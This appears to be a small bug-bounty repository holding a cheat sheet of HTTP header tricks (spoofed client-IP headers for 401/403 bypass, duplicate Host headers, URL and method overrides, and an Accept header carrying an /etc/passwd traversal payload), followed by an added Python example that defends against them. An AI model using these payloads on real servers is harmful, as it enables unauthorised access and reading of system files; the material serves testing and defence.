├── HTTP-Headers-And-Tricks
└── README.md


/HTTP-Headers-And-Tricks:
--------------------------------------------------------------------------------
# Add something like 127.0.0.1, localhost, 192.168.1.2, target.com or /admin, /console
Client-IP:
Connection:
Contact:
Forwarded:
From:
Host:
Origin:
Referer:
True-Client-IP:
X-Client-IP:
X-Custom-IP-Authorization:
X-Forward-For:
X-Forwarded-For:
X-Forwarded-Host:
X-Forwarded-Server:
X-Host:
X-Original-URL:
X-Originating-IP:
X-Real-IP:
X-Remote-Addr:
X-Remote-IP:
X-Rewrite-URL:
X-Wap-Profile:

# Try to repeat the same Host header 2 times
Host: legit.com
Stuff: stuff
Host: evil.com

# Bypass type limit
Accept: application/json, text/javascript, */*; q=0.01
Accept: ../../../../../../../../../etc/passwd{{'

# Try to change the HTTP version from 1.1 to HTTP/0.9 and remove the Host header

# 401/403 bypasses
# Whitelisted IP 127.0.0.1 or localhost
Client-IP: 127.0.0.1
Forwarded-For-Ip: 127.0.0.1
Forwarded-For: 127.0.0.1
Forwarded-For: localhost
Forwarded: 127.0.0.1
Forwarded: localhost
True-Client-IP: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Forward-For: 127.0.0.1
X-Forward: 127.0.0.1
X-Forward: localhost
X-Forwarded-By: 127.0.0.1
X-Forwarded-By: localhost
X-Forwarded-For-Original: 127.0.0.1
X-Forwarded-For-Original: localhost
X-Forwarded-For: 127.0.0.1
X-Forwarded-For: localhost
X-Forwarded-Server: 127.0.0.1
X-Forwarded-Server: localhost
X-Forwarded: 127.0.0.1
X-Forwarded: localhost
X-Forwared-Host: 127.0.0.1
X-Forwared-Host: localhost
X-Host: 127.0.0.1
X-Host: localhost
X-HTTP-Host-Override: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Real-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-Addr: localhost
X-Remote-IP: 127.0.0.1

# Fake Origin - make a GET request to an accessible endpoint with:
X-Original-URL: /admin
X-Override-URL: /admin
X-Rewrite-URL: /admin
Referer: /admin
# Also try with an absolute URL https://domain.com/admin

# Method Override
X-HTTP-Method-Override: PUT

# Provide full path GET
GET https://vulnerable-website.com/ HTTP/1.1
Host: evil-website.com

# Add line wrapping
GET /index.php HTTP/1.1
Host: vulnerable-website.com
Host: evil-website.com

# Wordlists
https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/BurpSuite-ParamMiner/lowercase-headers
https://github.com/danielmiessler/SecLists/tree/bbb4d86ec1e234b5d3cfa0a4ab3e20c9d5006405/Miscellaneous/web/http-request-headers

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# bugbounty stuff

--------------------------------------------------------------------------------
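
The headers in the "401/403 bypasses", "Fake Origin" and duplicate Host entries only work when a server believes client-supplied values. The following is an added example, not part of this repository, of a server-side check that makes them ineffective. It assumes the reverse proxies live in 10.0.0.0/8 and append the connecting peer address to X-Forwarded-For; the function names and the header set are illustrative.

```python
import ipaddress

# Assumption: the only hosts allowed to speak for a client are these reverse proxies.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]

# Headers from the list above that a client can set freely; none may reach app logic.
SPOOFABLE = {
    "client-ip", "true-client-ip", "x-client-ip", "x-custom-ip-authorization",
    "x-forward-for", "x-originating-ip", "x-real-ip", "x-remote-addr",
    "x-remote-ip", "x-host", "x-forwarded-host", "x-forwarded-server",
    "x-original-url", "x-rewrite-url", "x-override-url", "x-http-method-override",
}

def is_trusted_proxy(addr):
    """True if addr parses as an IP inside TRUSTED_PROXIES (ValueError if not an IP)."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in TRUSTED_PROXIES)

def client_ip(peer_addr, headers):
    """Address to use for IP allowlists, or None when it cannot be established.

    peer_addr is the TCP peer address; headers is a list of (name, value) pairs.
    """
    if not is_trusted_proxy(peer_addr):
        return peer_addr  # direct connection: every forwarding header is ignored
    hops = []
    for name, value in headers:
        if name.lower() == "x-forwarded-for":
            hops += [h.strip() for h in value.split(",")]
    # Walk right to left: entries appended by our proxies are last, client data first.
    for hop in reversed(hops):
        try:
            if not is_trusted_proxy(hop):
                return hop
        except ValueError:
            return None  # "localhost" or other non-IP entry: deny
    return peer_addr

def sanitize(headers):
    """Reject duplicate Host headers and drop client-controlled override headers."""
    if sum(1 for name, _ in headers if name.lower() == "host") != 1:
        raise ValueError("request must carry exactly one Host header")
    return [(n, v) for n, v in headers if n.lower() not in SPOOFABLE]
```

Run `sanitize` at the edge before routing, and base allowlist decisions on `client_ip` only, treating `None` as deny.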